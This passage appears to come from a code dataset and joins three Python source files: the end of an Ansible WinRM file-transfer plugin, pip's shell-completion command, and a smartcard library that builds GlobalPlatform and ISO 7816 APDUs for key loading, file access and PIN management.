self._winrm_exec(cmd_parts[0], cmd_parts[1:]) if result.status_code != 0: raise IOError(result.std_err.encode('utf-8')) if result.std_out.strip() == '[DIR]': data = None else: data = base64.b64decode(result.std_out.strip()) if data is None: makedirs_safe(out_path) break else: if not out_file: # If out_path is a directory and we're expecting a file, bail out now. if os.path.isdir(out_path): break out_file = open(out_path, 'wb') out_file.write(data) if len(data) < buffer_size: break offset += len(data) except Exception: traceback.print_exc() raise AnsibleError("failed to transfer file to %s" % out_path) finally: if out_file: out_file.close() def close(self): if self.protocol and self.shell_id: self.protocol.close_shell(self.shell_id) self.shell_id = None
gpl-3.0
ntuecon/server
pyenv/Lib/site-packages/pip/commands/completion.py
343
2453
from __future__ import absolute_import import sys from pip.basecommand import Command BASE_COMPLETION = """ # pip %(shell)s completion start%(script)s# pip %(shell)s completion end """ COMPLETION_SCRIPTS = { 'bash': """ _pip_completion() { COMPREPLY=( $( COMP_WORDS="${COMP_WORDS[*]}" \\ COMP_CWORD=$COMP_CWORD \\ PIP_AUTO_COMPLETE=1 $1 ) ) } complete -o default -F _pip_completion pip """, 'zsh': """ function _pip_completion { local words cword read -Ac words read -cn cword reply=( $( COMP_WORDS="$words[*]" \\ COMP_CWORD=$(( cword-1 )) \\ PIP_AUTO_COMPLETE=1 $words[1] ) ) } compctl -K _pip_completion pip """, 'fish': """ function __fish_complete_pip set -lx COMP_WORDS (commandline -o) "" set -lx COMP_CWORD (math (contains -i -- (commandline -t) $COMP_WORDS)-1) set -lx PIP_AUTO_COMPLETE 1 string split \ -- (eval $COMP_WORDS[1]) end complete -fa "(__fish_complete_pip)" -c pip """} class CompletionCommand(Command): """A helper command to be used for command completion.""" name = 'completion' summary = 'A helper command used for command completion.' def __init__(self, *args, **kw): super(CompletionCommand, self).__init__(*args, **kw) cmd_opts = self.cmd_opts cmd_opts.add_option( '--bash', '-b', action='store_const', const='bash', dest='shell', help='Emit completion code for bash') cmd_opts.add_option( '--zsh', '-z', action='store_const', const='zsh', dest='shell', help='Emit completion code for zsh') cmd_opts.add_option( '--fish', '-f', action='store_const', const='fish', dest='shell', help='Emit completion code for fish') self.parser.insert_option_group(0, cmd_opts) def run(self, options, args): """Prints the completion code of the given shell""" shells = COMPLETION_SCRIPTS.keys() shell_options = ['--' + shell for shell in sorted(shells)] if options.shell in shells: script = COMPLETION_SCRIPTS.get(options.shell, '') print(BASE_COMPLETION % {'script': script, 'shell': options.shell}) else: sys.stderr.write( 'ERROR: You must pass %s\n' % ' or '.join(shell_options) )
bsd-3-clause
suma12/asterix
asterix/APDU.py
1
31348
""" asterix/APDU.py __author__ = "Petr Tobiska" Author: Petr Tobiska, mailto:petr.tobiska@gmail.com This file is part of asterix, a framework for communication with smartcards based on pyscard. This file implements handfull APDU commands. asterix is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. asterix is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with pyscard; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA References: [GP CS] GlobalPlatform Card Specification, Version 2.2.1, Jan 2011 [GP AmD] Secure Channel Protocol 03, Card Specification v 2.2 - Amendment D, Version 1.1, Sep 2009 """ import re import hashlib import random from struct import pack, unpack from binascii import hexlify, unhexlify # PyCrypto from Crypto.Cipher import DES, DES3, AES # ECSDA from ecdsa import ecdsa, ellipticcurve # pyscard from smartcard.ATR import ATR # asterix from formutil import s2l, l2s, derLen, derLV, s2int, int2s, s2ECP, chunks,\ split2TLV, findTLValue, swapNibbles from GAF import GAF from applet import DESsign from SCP03 import CMAC from mycard import ISOException, resetCard __all__ = ('calcKCV', 'putKey', 'storeDataPutKey', 'push2B_DGI', 'X963keyDerivation', 'Push3scenario', 'selectApplet', 'openLogCh', 'closeLogCh', 'getStatus', 'getExtCardRes', 'getData', 'selectFile', 'readBinary', 'readRecord', 'updateBinary', 'updateRecord', 'verifyPin', 'changePin', 'disablePin', 'enablePin', 'unblockPin', 'selectUSIM', 'cardInfo', 'KeyType') INS_VERIFY_PIN = 0x20 INS_CHANGE_PIN = 0x24 
INS_DISABLE_PIN = 0x26 INS_ENABLE_PIN = 0x28 INS_UNBLOCK_PIN = 0x2C INS_MANAGE_LOGCH = 0x70 INS_SELECT = 0xA4 INS_READBIN = 0xB0 INS_READREC = 0xB2 INS_GETDATA = 0xCA INS_UPDBIN = 0xD6 INS_UPDREC = 0xDC INS_PUTKEY = 0xD8 INS_STOREDATA = 0xE2 INS_GETSTATUS = 0xF2 class KeyType: """Key types as defined in [GP CS] Tab 11.16""" # subset of currently supported keys DES_IMPLICIT = 0x80 TDES_CBC = 0x82 DES_ECB = 0x83 DES_CBC = 0x84 AES = 0x88 def calcKCV(keyValue, zAES=False): """Calculate KCV for symmetric key. keyValue - key values as string (DES, 3DES2k, 3DES3k, AES) zAES - True if key is AES (i.e. encrypt block of '01' instead of '00') Return 3B-long string.""" if zAES: assert len(keyValue) in (16, 24, 32), "Wrong length of AES key" block = '\x01'*16 tkey = AES.new(keyValue, AES.MODE_ECB) else: assert len(keyValue) in (8, 16, 24), "Wrong length of (3)DES key" block = '\x00'*8 if len(keyValue) == 8: tkey = DES.new(keyValue, DES.MODE_ECB) else: tkey = DES3.new(keyValue, DES.MODE_ECB) return tkey.encrypt(block)[:3] def putKey(oldKeyVersion, newKeyVersion, keyId, keyComponents, zMoreCmd=False, zMultiKey=False, keyDEK=None, lenMAC=8): """Build APDU for PUT KEY command. oldKeyVersion - key version to be replaced. If zero, new key is created. newKeyVersion - key version of key being put keyId - id of the 1st key being put keyComponents - list of key components being put. Each componet is a tuple of key type (u8) and value (string). zMoreCmd - P1.b8, signals if there is more commands zMultiKey - P2.b8, signals if more than one component being put keyDEK - KIK or DEK key. keyDEK.encrypt(data) called to encrypt (including padding) key component value if not None. If has attribute zAES and keyDEK.zAES evaluates as True, it is considered as AES key and [GP AmD] 7.2 formatting is used. lenMAC - length of CMAC for AES. 
Applicable if AES key with key id=0x02 (KID) and key version 0x01-0x0F or 0x11 is being put with AES keyDEK (see ETSI 102.226 rel 9+, 8.2.1.5) Returns APDU built (as list of u8). See [GP CS] 11.8 and [GP AmD] 7.2 for reference. See [GP CS] Tab 11.16 for coding of key type. Currently only Format1 supported. """ # sanity check assert 0 <= oldKeyVersion < 0x80 assert 0 < newKeyVersion < 0x80 assert 0 < keyId < 0x80 assert len(keyComponents) > 0 assert lenMAC in (4, 8) P1 = (zMoreCmd and 0x80 or 0) | oldKeyVersion P2 = (zMultiKey and 0x80 or 0) | keyId data = chr(newKeyVersion) for kc in keyComponents: keyType, keyVal = kc[:2] # ignore eventual keyUsage and keyAccess assert 0 <= keyType < 0xFF if keyDEK: encValue = keyDEK.encrypt(keyVal) # for AES as keyDEK, prepend length of component if 'zAES' in dir(keyDEK) and keyDEK.zAES: encValue = derLen(keyVal) + encValue # see ETSI 102.226 rel 9+, 8.2.1.5 if keyType == KeyType.AES and keyId == 2 and \ newKeyVersion in range(0x01, 0x10) + [0x11]: encValue += chr(lenMAC) else: encValue = keyVal # calculate KCV if keyType in (KeyType.DES_IMPLICIT, KeyType.TDES_CBC, KeyType.DES_ECB, KeyType.DES_CBC, KeyType.AES): kcv = calcKCV(keyVal, keyType == KeyType.AES) else: kcv = '' data += chr(keyType) + derLen(encValue) + encValue + derLen(kcv) + kcv keyId += 1 apdu = [0x80, INS_PUTKEY, P1, P2, len(data)] + s2l(data) return apdu def push2B_DGI(keyVer, keys, keyCASDenc): """ Create DGI 00A6 and 8010 for Push2B scenario keyVer - key verions (u8) keys - ((keytype, keyvalue)); 1 or 3 sym. keys keyCASDenc - a method to call for encryption 8010 content Return DGIs built (as list of strings).""" # DGI tag on 2B (GP Card Spec 2.2.1, 11.1.12) # DGI length coding as in GP Systems Scripting Language Spec. v1.1.0, an. B # i.e. 
on 1B for x < 255, FF<yyyy> for x >=255 KAT = GAF(""" -- Control Reference Template (KAT) -- see GP 2.2.1 AmA 4.4 00A6 #[ A6 #( 90 #(04) -- scenario identifier: Push#2B 95 #($keyUsage) 80 #($keyType) 81 #($keyLen) 83 #($keyVer) -- 45 #($SDIN) -- optional Security Domain Image Number )] """) assert len(keys) in (1, 3), "One or three sym. keys expected" keyUsage = len(keys) == 1 and '\x5C' or '\x10' # Tab. 13 keyType = keys[0][0] assert all([k[0] == keyType for k in keys]), "Key types differ" # remap keyType to '80' as required by GP UICC config 10.3.1 if keyType in (KeyType.TDES_CBC, KeyType.DES_ECB, KeyType.DES_CBC): keyType = KeyType.DES_IMPLICIT lens = [len(k[1]) for k in keys] l = max(lens) assert l == min(lens), "Key lengths differ" dgi00A6 = KAT.eval(keyUsage=keyUsage, keyType=chr(keyType), keyLen=chr(l), keyVer=chr(keyVer)) data = keyCASDenc(''.join([k[1] for k in keys])) dgi8010 = pack(">H", 0x8010) + chr(len(data)) + data return (dgi00A6, dgi8010) def storeDataPutKeyDGI(keyVer, keyComponents, keyId=1, keyDEK=None): """Build DGI for Store Data for Put Key. keyVer - key version of key being created keyComponents - list of key components being put. Each componet is a tuple of key type (u8), value (string) and optionally Key Usage Qualifier and Key Access (u8, defaults 0x18, 0x14 or 0x48 for key UQ, 0x00 for key ac.) keyId - id of the 1st key being created (optional, u8, default 1) keyDEK - KIK or DEK key. keyDEK.encrypt(data) called to encrypt (including padding) key component value if not None. If has attribute zAES and keyDEK.zAES evaluates as True, it is considered as AES key and [GP AmD] 7.2 formatting is used. Returns DGIs built (as list of string). See GP 2.2.1 AmA 4.10.2 for reference. 
""" # sanity check assert 0 < keyVer and keyVer < 0x80 assert 0 < keyId and keyId < 0x80 assert len(keyComponents) > 0 KeyUQ = (None, 0x38, 0x34, 0xC8) # see GP 2.2.1, 11.1.9 templ = """ B9 #(95#($keyUQ) 96#($keyAc) 80#($keyType) 81#($keyLen) 82#($keyId) 83#($keyVer) 84#($KCV))""" d = {'keyVer': chr(keyVer)} B9 = '' dgi8113 = [] for kc in keyComponents: assert len(kc) in (2, 4), "wrong keyComponent" + kc.__str__() if len(kc) == 2: keyType, keyVal = kc keyUQ = 1 <= keyId <= 3 and KeyUQ[keyId] or 0xFF keyAc = 0x00 else: keyType, keyVal, keyUQ, keyAc = kc d['keyLen'] = chr(len(keyVal)) assert 0 <= keyType < 0xFF if keyType in (KeyType.DES_IMPLICIT, KeyType.TDES_CBC, KeyType.DES_ECB, KeyType.DES_CBC, KeyType.AES): d['KCV'] = calcKCV(keyVal, keyType == KeyType.AES) else: d['KCV'] = '' d['keyId'] = chr(keyId) for k in ('keyType', 'keyUQ', 'keyAc', 'keyId'): d[k] = chr(locals()[k]) tlv = GAF(templ).eval(**d) if keyDEK: encValue = keyDEK.encrypt(keyVal) else: encValue = keyVal B9 += tlv dgi8113.append(pack(">HB", 0x8113, len(encValue)) + encValue) keyId += 1 return(pack(">HB", 0x00B9, len(B9)) + B9, dgi8113) def storeDataPutKey(keyVer, keyComponents, keyId=1, keyDEK=None): """Build APDU for Store Data for Put Key. keyVer, keyComponents, keyId and keyDEK as in storeDataPutKeyDGI. 
Return APDU a u8 list.""" dgi00B9, dgi8113 = storeDataPutKeyDGI(keyVer, keyComponents, keyId, keyDEK) data = dgi00B9 + ''.join(dgi8113) assert len(data) < 256, "Longer Put Key not implemented" P1 = 0x88 P2 = 0 apdu = [0x80, INS_STOREDATA, P1, P2, len(data)] + s2l(data) return apdu # ###### Scenario 3 stuff # Preloaded ECC Curve Parameters, GP 2.2.1 AmE 4.5 # N.B., all have cofactor = 1 ECC_Curves = { 0x00: ecdsa.generator_256, # NIST P-256 0x01: ecdsa.generator_384, # NIST P-384 0x02: ecdsa.generator_521, # NIST P-521 # 0x03: brainpoolP256r1, # 0x04: brainpoolP256t1, # 0x05: brainpoolP384r1, # 0x06: brainpoolP384t1, # 0x07: brainpoolP512r1, # 0x08: brainpoolP512t1, } # tag definition T_IIN = 0x42 T_SDIN = T_CIN = 0x45 T_keyType = 0x80 T_keyLen = 0x81 T_keyID = 0x82 T_keyVer = 0x83 T_DR = 0x85 T_HostID = 0x84 T_receipt = 0x86 T_scenarioID = 0x90 T_seqCounter = 0x91 T_keyUsage = 0x95 T_keyAcc = 0x96 T_CRT = 0xA6 def X963keyDerivation(sharedSecret, bytelen, sharedInfo='', h = hashlib.sha256): """ X9.63 Key Derivation Function as deifned in TR-03111 4.3.3 bytelen - expected length of Key Data sharedSecret, sharedInfo - strings h - function to create HASH object (default hashlib.sha256) Return Key Data (string) Reference: TR-03111: BSI TR-03111 Elliptic Curve Cryptography, Version 2.0 https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/TechGuidelines/TR03111/BSI-TR-03111_pdf.html""" keyData = '' l = h().digest_size j = (bytelen - 1)/l + 1 for i in xrange(1, 1+j): keyData += h(sharedSecret + pack(">L", i) + sharedInfo).digest() return keyData[:bytelen] def DESMAC(key, data): """ Calculate MAC single DES with final 3DES""" return DESsign(key).calc(data) ktDES = KeyType.DES_IMPLICIT ktAES = KeyType.AES class Push3scenario: """ Implementation of Global Platform Push #3 scenario (ECKA)""" def __init__(self, keyParRef, pkCASD, **kw): """ Constructor keyParRef - Key Parameter Reference pkCASD - PK.CASD.ECKA (tuple long x, long y) optional **kw: IIN, CIN (as 
strings)""" assert keyParRef in ECC_Curves, \ "Unknown Key param reference 0x%02X" % keyParRef self.keyParRef = keyParRef self.generator = ECC_Curves[keyParRef] self.curve = self.generator.curve() self.bytelen = len(int2s(self.curve.p())) assert self.bytelen in (32, 48, 64, 66) # currently allowed keys pkCASDxy = s2ECP(pkCASD) assert self.curve.contains_point(*pkCASDxy),\ "PK.CASD.ECKA not on the curve" self.pkCASD = ellipticcurve.Point(self.curve, *pkCASDxy) for k in ('IIN', 'CIN'): if k in kw: assert isinstance(kw[k], str) self.__dict__[k] = kw[k] def makeDGI(self, keyVer, privkey=None, keys=([(KeyType.AES, 16)]*3), zDelete=False, zDR=False, zID=False, **kw): """ Prepare data for Push #3 scenario and generate keys. keyVer - key version to create privkey - eSK.AP.ECKA (secret multiplier as string) randomly generated if None keys - [(keyType, keyLen)] to generate zDelete, zDR, zID - bits 1-3 of Parameters of scenario, (GP AmE, Tab. 4-17) optional **kw: keyId, seqCounter, SDIN, HostID Return <data for StoreData>""" if privkey is None: secexp = random.randrange(2, self.generator.order()) else: secexp = s2int(privkey) assert 1 < secexp < self.generator.order(), "Wrong eSK.AP.ECKA" print "eSK.AP.ECKA = %X" % secexp pubkey = self.generator * secexp dgi7F49 = pack(">HBB", 0x7F49, 2*self.bytelen+1, 4) + \ int2s(pubkey.x(), self.bytelen * 8) + \ int2s(pubkey.y(), self.bytelen * 8) # calculate Shared Secret, suppose that cofactor is 1 S_AB = secexp * self.pkCASD self.sharedSecret = int2s(S_AB.x(), self.bytelen * 8) print "Shared Secret =", hexlify(self.sharedSecret).upper() # build DGI 00A6 if zID: assert hasattr(self, 'IIN'), "Missing IIN while CardId requested" assert hasattr(self, 'CIN'), "Missing cIN while CardId requested" assert 'HostID' in kw and isinstance(kw['HostID'], str) self.HostCardID = ''.join([derLV(v) for v in (kw['HostID'], self.IIN, self.CIN)]) else: self.HostCardID = '' self.zDR = zDR scenarioPar = (zDelete and 1 or 0) +\ (zDR and 2 or 0) +\ (zID and 4 
or 0) assert all([k[0] in (KeyType.DES_IMPLICIT, KeyType.AES) for k in keys]) ktl1 = keys[0] zDifKey = any([keys[i] != ktl1 for i in xrange(1, len(keys))]) tA6value = pack("BBBB", T_scenarioID, 2, 3, scenarioPar) if zDifKey: self.receiptAlgo = CMAC self.keyLens = [16] + [k[1] for k in keys] self.keyDesc = '' if 'keyId' in kw: tA6value += pack("BBB", T_keyID, 1, kw['keyId']) tA6value += pack("BBB", T_keyVer, 1, keyVer) # default keyUsage from GP 2.2.1 AmE tab. 4-16 for ENC, MAC, DEK for k, keyUsage in zip(keys, (0x38, 0x34, 0xC8)): if len(k) > 2: keyUsage = k[2] tB9value = pack("BBB", T_keyUsage, 1, keyUsage) if len(k) >= 4: # optional key Access as fourth elem. of key tB9value += pack("BBB", T_keyAcc, 1, k[3]) tB9value += pack("BBB", T_keyType, 1, k[0]) tB9value += pack("BBB", T_keyLen, 1, k[1]) self.keyDesc += pack("BBB", keyUsage, *k[:2]) tA6value += '\xB9' + derLV(tB9value) else: assert len(keys) in (1, 3), \ "One or three secure ch. keys expected." self.keyLens = [ktl1[1]] * (1 + len(keys)) self.receiptAlgo = ktl1[0] == KeyType.AES and CMAC or DESMAC keyUsage = len(keys) == 1 and 0x5C or 0x10 self.keyDesc = pack("BBB", keyUsage, *ktl1[:2]) tA6value += pack("BBB", T_keyUsage, 1, keyUsage) if len(ktl1) == 4: tA6value += pack("BBB", T_keyAcc, 1, ktl1[3]) tA6value += pack("BBB", T_keyType, 1, ktl1[0]) tA6value += pack("BBB", T_keyLen, 1, ktl1[1]) if 'keyId' in kw: tA6value += pack("BBB", T_keyID, 1, kw['keyId']) tA6value += pack("BBB", T_keyVer, 1, keyVer) if 'seqCounter' in kw: tA6value += chr(T_seqCounter) + derLV(kw['seqCounter']) if 'SDIN' in kw: tA6value += chr(T_SDIN) + derLV(kw['SDIN']) if zID: tA6value += chr(T_HostID) + derLV(kw['HostID']) self.tA6 = chr(T_CRT) + derLV(tA6value) dgi00A6 = pack(">HB", 0x00A6, len(self.tA6)) + self.tA6 return (dgi00A6, dgi7F49) def generKeys(self, respData): """ Verify receipt and generate symmetric keys. 
respData - response to Store Data (string) Return generated keys (tuple of strings)""" try: data2rec = self.tA6 except KeyError: print "Run makeDGI first" return respTLV = split2TLV(respData) if self.zDR: lenDR = (self.bytelen // 32) * 16 # map to 16, 24 or 32 DR = respTLV[0][1] assert len(respTLV) == 2 and \ respTLV[0][0] == T_DR and len(DR) == lenDR data2rec += pack("BB", T_DR, lenDR) + DR else: assert len(respTLV) == 1 assert respTLV[-1][0] == T_receipt receipt = respTLV[-1][1] sharedInfo = self.keyDesc if self.zDR: sharedInfo += DR if hasattr(self, 'HostCardID'): sharedInfo += self.HostCardID print "Shared Info =", hexlify(sharedInfo).upper() keyData = X963keyDerivation(self.sharedSecret, sum(self.keyLens), sharedInfo) keyDataIt = chunks(keyData, self.keyLens) receiptKey = keyDataIt.next() print "Receipt Key =", hexlify(receiptKey).upper() expReceipt = self.receiptAlgo(receiptKey, data2rec) assert receipt == expReceipt, "Receipt verification failed" return [k for k in keyDataIt if k] # skip empty rest def selectApplet(c, AID, logCh=0): """ Select applet on a given logical channel or open new log. channel if logCh is None. """ if logCh is None: logCh = openLogCh(c) # select the Applet on the given logical channel apdu = [logCh, INS_SELECT, 4, 0, len(AID)] + s2l(AID) resp, sw1, sw2 = c.transmit(apdu) if sw1 == 0x6C and len(AID) == 0: apdu = [logCh, INS_SELECT, 4, 0, sw2] resp, sw1, sw2 = c.transmit(apdu) if(sw1 == 0x61): apdu = [logCh, 0xC0, 0, 0, sw2] resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) respdata = l2s(resp) # close channel return (respdata, logCh) def openLogCh(c): """ Manage channel to open logical channel. 
""" apdu = [0, INS_MANAGE_LOGCH, 0, 0, 1] resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) return resp[0] def closeLogCh(c, logCh): apdu = [0, INS_MANAGE_LOGCH, 0x80, logCh, 0] resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) class GetStatusData: """Represent and interpret data from Get status for Packages and Modules""" def __init__(self, respdataPM, respdataApp): ind = 0 self.packages = [] while len(respdataPM) > ind: length = respdataPM[ind] pack_aid = l2s(respdataPM[ind+1: ind+1+length]) ind += length + 1 lcs = respdataPM[ind] priv = respdataPM[ind+1] nmod = respdataPM[ind+2] ind += 3 mods = [] for i in xrange(nmod): length = respdataPM[ind] mods.append(l2s(respdataPM[ind+1: ind+1+length])) ind += length + 1 self.packages.append({'pack_aid': pack_aid, 'lcs': lcs, 'priv': priv, 'modules': mods}) ind = 0 self.insts = [] while len(respdataApp) > ind: length = respdataApp[ind] app_aid = l2s(respdataApp[ind+1: ind+1+length]) ind += length + 1 lcs = respdataApp[ind] priv = respdataApp[ind+1] ind += 2 self.insts.append({'app_aid': app_aid, 'lcs': lcs, 'priv': priv}) def __str__(self): res = '' for p in self.packages: res += "Package AID: %s %02X %02X\n" % \ (hexlify(p['pack_aid']).upper().ljust(32), p['lcs'], p['priv']) for m in p['modules']: res += " module %s\n" % hexlify(m).upper().ljust(32) for p in self.insts: res += "Insts AID : %s %02X %02X\n" % \ (hexlify(p['app_aid']).upper().ljust(32), p['lcs'], p['priv']) return res def getStatus(sc, AID_pref=''): """ Issue GET STATUS apdu for packages and modules, and instances. 
""" res = {} for P1 in (0x10, 0x40): apdu = [0x80, INS_GETSTATUS, P1, 0, 2+len(AID_pref), 0x4F, len(AID_pref)] + s2l(AID_pref) respdata, sw1, sw2 = sc.transmit(apdu) sw = (sw1 << 8) + sw2 while sw == 0x6310: apdu = [0x80, INS_GETSTATUS, P1, 1, 2+len(AID_pref), 0x4F, len(AID_pref)] + s2l(AID_pref) resp, sw1, sw2 = sc.transmit(apdu) respdata += resp sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) res[P1] = respdata return GetStatusData(res[0x10], res[0x40]) def getData(c, tag): P1 = tag >> 8 P2 = tag & 0xFF apdu = [0x80, INS_GETDATA, P1, P2, 0] resp, sw1, sw2 = c.transmit(apdu) if sw1 == 0x6C: apdu[4] = sw2 resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) return l2s(resp) def getExtCardRes(c): """ Issue GET DATA with tag FF21 in order to receive Extended Card Resources (GP 2.2.1, 11.3 & ETSI TS 102.226, 8.2.1.7). Returns [num. of install applets, free NVM, free RAM]""" # CLA = 0x00: return only value # CLA = 0x80: return TLV, i.e. 
0xFF21 #(value) apdu = [0x80, INS_GETDATA, 0xFF, 0x21, 0] resp, sw1, sw2 = c.transmit(apdu) if sw1 == 0x6C: apdu[4] = sw2 resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) payload = l2s(resp) result = [s2int(findTLValue(payload, (0xFF21, tag))) for tag in (0x81, 0x82, 0x83)] return result def selectFile(c, path, logCh=0): """ Select file by path from MF or MF for empty path """ if len(path) > 0: apdu = [logCh, INS_SELECT, 8, 4, len(path)] + s2l(path) else: apdu = [logCh, INS_SELECT, 0, 4, 2, 0x3F, 0x00] resp, sw1, sw2 = c.transmit(apdu) if sw1 == 0x61: resp, sw1, sw2 = c.transmit([0, 0xC0, 0, 0, sw2]) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) return l2s(resp) def readBinary(c, le, logCh=0, offset=0): """Read Binary on currently selected EF""" P1 = (offset >> 8) & 0x7F P2 = offset & 0xFF apdu = [logCh, INS_READBIN, P1, P2, le] resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) return l2s(resp) def readRecord(c, recNum, logCh=0): """ Read record from currently selected EF""" apdu = [logCh, INS_READREC, recNum, 4, 0] resp, sw1, sw2 = c.transmit(apdu) if sw1 == 0x6C: apdu[4] = sw2 resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) return l2s(resp) def updateBinary(c, data, logCh=0, offset=0): """Update binary on currently selected EF""" assert len(data) < 0x100 P1 = (offset >> 8) & 0x7F P2 = offset & 0xFF apdu = [logCh, INS_UPDBIN, P1, P2, len(data)] + s2l(data) resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) def updateRecord(c, recNum, data, logCh=0): """ Update record from currently selected EF""" assert len(data) < 0x100 apdu = [logCh, INS_UPDREC, recNum, 4, len(data)] + s2l(data) resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) def verifyPin(c, pin=None, P2=0x01, logCh=0): """Verify PIN pin - value (str, 4-8bytes). 
If None, just get number of tries. P2 - PIN identification (0x01: PIN1 (default), 0x81: PIN2, etc.) logCh - logical channel (default 0) Return number of remaing tries or True if verification succesfull. """ lc = 0 if pin is None else 8 apdu = [logCh, INS_VERIFY_PIN, 0, P2, lc] if pin is not None: assert 4 <= len(pin) <= 8 pin += '\xFF' * (8 - len(pin)) apdu += s2l(pin) resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw == 0x6983: # PIN blocked return 0 if 0x63C0 <= sw <= 0x63CA: # remaining tries return sw - 0x63C0 if sw != 0x9000: raise ISOException(sw) return True # pin verified def changePin(c, oldPin, newPin, P2=0x01, logCh=0): """Change PIN oldPin - old PIN value (str, 4-8bytes) newPin - new PIN value (str, 4-8bytes) P2 - PIN identification (0x01: PIN1 (default), 0x81: PIN2, etc.) logCh - logical channel (default 0) """ assert 4 <= len(oldPin) <= 8 oldPin += '\xFF' * (8 - len(oldPin)) assert 4 <= len(newPin) <= 8 newPin += '\xFF' * (8 - len(newPin)) apdu = [logCh, INS_CHANGE_PIN, 0, P2, 0x10] + s2l(oldPin) + s2l(newPin) resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) def disablePin(c, pin, P2=0x01, logCh=0): """Disable PIN pin - PIN value (str, 4-8bytes) P2 - PIN identification (0x01: PIN1 (default), 0x81: PIN2, etc.) logCh - logical channel (default 0) """ assert 4 <= len(pin) <= 8 pin += '\xFF' * (8 - len(pin)) apdu = [logCh, INS_DISABLE_PIN, 0, P2, 8] + s2l(pin) resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) def enablePin(c, pin, P2=0x01, logCh=0): """Enable PIN pin - PIN value (str, 4-8bytes) P2 - PIN identification (0x01: PIN1 (default), 0x81: PIN2, etc.) 
logCh - logical channel (default 0) """ assert 4 <= len(pin) <= 8 pin += '\xFF' * (8 - len(pin)) apdu = [logCh, INS_ENABLE_PIN, 0, P2, 8] + s2l(pin) resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) def unblockPin(c, puk, newPin, P2=0x01, logCh=0): """unblock PIN puk - new PIN value (str, 4-8bytes) newPin - PIN value (str, 4-8bytes) P2 - PIN identification (0x01: PIN1 (default), 0x81: PIN2, etc.) logCh - logical channel (default 0) """ assert len(puk) == 8 assert 4 <= len(newPin) <= 8 newPin += '\xFF' * (8 - len(newPin)) apdu = [logCh, INS_UNBLOCK_PIN, 0, P2, 0x10] + s2l(puk) + s2l(newPin) resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) def selectUSIM(c, logCh=0): """Select USIM, return AID Read EF_DIR, USIM = first application with AID of USIM (3GPP TS 31.110)""" # read EF_DIR infoDIR = selectFile(c, unhexlify('2F00'), logCh) # see ETSI 102.221 11.1.1.4.3 for coding fileDesc = findTLValue(infoDIR, (0x62, 0x82)) assert len(fileDesc) == 5 and \ fileDesc[:2] == '\x42\x21' # linear EF recLen, nRec = unpack(">HB", fileDesc[2:5]) aids = [] for recNum in xrange(1, nRec+1): try: r = readRecord(c, recNum) if r == '\xFF' * len(r): continue aid = findTLValue(r, (0x61, 0x4F)) aids.append(aid) except ISOException: break # search for USIM for aid in aids: if aid[:7] == unhexlify('A0000000871002'): infoUSIM = selectApplet(c, aid, logCh) return aid return None def cardInfo(c, USIMpin=None, logCh=0): """Deselect, read EF_DIR, EF_ICCID""" resetCard(c) histBytes = l2s(ATR(c.getATR()).getHistoricalBytes()) infoMF = selectFile(c, '', logCh) # read EF_ICCID infoICCID = selectFile(c, unhexlify('2FE2'), logCh) fileSize = s2int(findTLValue(infoICCID, (0x62, 0x80))) assert fileSize == 10, "Wrong size of EF_ICCID" iccid = swapNibbles(readBinary(c, fileSize)) # read EF_DIR infoDIR = selectFile(c, unhexlify('2F00'), logCh) # see ETSI 102.221 11.1.1.4.3 for coding fileDesc = findTLValue(infoDIR, 
(0x62, 0x82)) assert len(fileDesc) == 5 and \ fileDesc[:2] == '\x42\x21' # linear EF recLen, nRec = unpack(">HB", fileDesc[2:5]) dirDO = [] for recNum in xrange(1, nRec+1): try: r = readRecord(c, recNum) if r == '\xFF' * len(r): continue aid = findTLValue(r, (0x61, 0x4F)) label = findTLValue(r, (0x61, 0x50)) dirDO.append({'AID': aid, 'label': label}) except ISOException: break # select USIM and try to read IMSI aids = [DO['AID'] for DO in dirDO if DO['AID'][:7] == unhexlify('A0000000871002')] if len(aids) >= 1: aid_usim = aids[0] # choose the first AID found else: aid_usim = None if aid_usim: infoUSIM = selectApplet(c, aid_usim, logCh) if USIMpin is not None: verifyPin(c, USIMpin, logCh=logCh) infoIMSI = selectFile(c, unhexlify('7FFF6F07'), logCh) try: bimsi = readBinary(c, 9, logCh) digits = reduce(lambda d, n: d + [ord(n) & 0x0F, ord(n) >> 4], bimsi[1:1+ord(bimsi[0])], []) digits.pop(0) # remove first nibble 8 or 9 while digits[-1] == 0x0F: digits.pop() # remove trailing F imsi = ''.join([chr(ord('0')+i) for i in digits]) except ISOException: imsi = None else: imsi = None # select default applet and get tags 45 and 